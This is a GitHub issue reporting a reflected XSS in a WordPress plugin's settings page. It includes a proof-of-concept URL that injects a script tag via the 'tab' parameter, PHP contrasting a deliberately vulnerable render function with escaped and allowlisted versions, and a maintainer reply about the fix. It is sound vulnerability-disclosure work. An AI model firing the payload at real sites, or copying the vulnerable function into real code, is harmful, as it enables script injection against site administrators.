TangibleInc / template-system

A template system for WordPress with content type loops and conditions
https://docs.loopsandlogic.com/reference/template-system/

XSS vulnerability requiring immediate patch #126

Closed GabrielGallagher closed 2 months ago

GabrielGallagher commented 2 months ago

How to reproduce Reflected XSS

Steps to Reproduce

After installing the plugin you can visit this html to trigger the XSS:

http://localhost/wp-admin/options-general.php?page=tangible-loops-and-logic-settings&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Additional Information

Environment

WordPress: 6.5.2
PHP: php:8.1-fpm
This PoC uses the nginx configuration from https://github.com/dimasma0305/dockerized-wordpress-debug-setup
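The payload in the report is the URL-decoded string `"><script>alert(1)</script>`: the leading `">` closes an attribute value that the `tab` query parameter was written into, and the rest lands as markup. The following is an added illustration, not the plugin's own code (the vulnerable source is not shown in this issue, and the function names, the `example-settings` page slug and the tab names are assumptions). It contrasts the unsafe pattern with two defences a WordPress settings page should have: an allowlist of valid tab names and output escaping with `esc_attr()` (shimmed with `htmlspecialchars()` so the file also runs outside WordPress).

```php
<?php
// Added example, not code from the template-system plugin.
// Demonstrates the reflected-XSS pattern from the report and a hardened form.

// Constructed sample input: the report's payload after URL decoding.
$sample_query = ['tab' => '"><script>alert(1)</script>'];

// VULNERABLE: the raw query parameter is concatenated into an attribute and
// into text. With the payload above, the href attribute is closed early and
// the <script> element is rendered as markup.
function render_tab_link_vulnerable(array $query): string
{
    $tab = $query['tab'] ?? 'general';
    return '<a href="?page=example-settings&tab=' . $tab . '" class="nav-tab">'
        . $tab . '</a>';
}

// esc_attr() exists in WordPress; outside WordPress fall back to
// htmlspecialchars() so this file runs stand-alone.
function esc_attr_compat(string $value): string
{
    if (function_exists('esc_attr')) {
        return esc_attr($value);
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Defence 1: only accept tab names the page actually defines (assumed list).
const ALLOWED_TABS = ['general', 'advanced'];

function current_tab(array $query): string
{
    $tab = $query['tab'] ?? 'general';
    if (!is_string($tab) || !in_array($tab, ALLOWED_TABS, true)) {
        return 'general';
    }
    return $tab;
}

// Defence 2: escape at the point of output regardless of the allowlist, so a
// later change to ALLOWED_TABS cannot reintroduce the bug.
function render_tab_link_hardened(array $query): string
{
    $tab = current_tab($query);
    return '<a href="?page=example-settings&tab=' . esc_attr_compat($tab)
        . '" class="nav-tab">' . esc_attr_compat(ucfirst($tab)) . '</a>';
}

// Escaping alone (no allowlist) is also sufficient to stop the breakout:
// the quote becomes &quot; and the angle brackets become &lt; / &gt;.
function render_tab_link_escaped_only(array $query): string
{
    $tab = (string) ($query['tab'] ?? 'general');
    return '<a href="?page=example-settings&tab=' . esc_attr_compat($tab)
        . '" class="nav-tab">' . esc_attr_compat($tab) . '</a>';
}

echo "vulnerable:   ", render_tab_link_vulnerable($sample_query), "\n";
echo "escaped only: ", render_tab_link_escaped_only($sample_query), "\n";
echo "hardened:     ", render_tab_link_hardened($sample_query), "\n";
```

Run with `php example.php`: the first line contains a literal `<script>` element, the other two contain only `&quot;&gt;&lt;script&gt;...` as inert text. The same distinction is the check to run against a live install after updating: request the settings page with the reported `tab` value (as a logged-in administrator, since `options-general.php` requires that capability) and confirm that the response body no longer contains the unescaped `"><script>` sequence.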

eliot-akira commented 2 months ago

Thank you for the information. L&L version 4.1.5 has been released with a fix.